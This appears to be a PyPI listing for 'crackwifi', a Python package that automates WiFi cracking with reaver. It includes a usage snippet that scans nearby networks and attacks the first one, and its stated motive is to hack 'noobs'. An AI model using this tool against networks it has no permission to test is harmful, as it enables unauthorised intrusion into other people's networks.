Skip to main content

Automate cracking wifis using reaver

Project description

crackwifi

crackwifi.png

Motivation

I am stupid hägger and do not want to have to remember reaver specific commands to hack noobs.

Installation

pip install crackwifi

Usage

from crackwifi import dump_networks, monitor

if __name__ == '__main__':
    with monitor("wlx6cfdb9b29a25"):
        networks = dump_networks(10)
	first = list(networks.values())[0]
	for progress in first.attack():
		print(progress)

License

This project is licensed under the GPL-3 license.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

crackwifi-0.1.1.tar.gz (2.6 kB view hashes)

Uploaded Source

Built Distribution

crackwifi-0.1.1-py3-none-any.whl (14.0 kB view hashes)

Uploaded Python 3

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page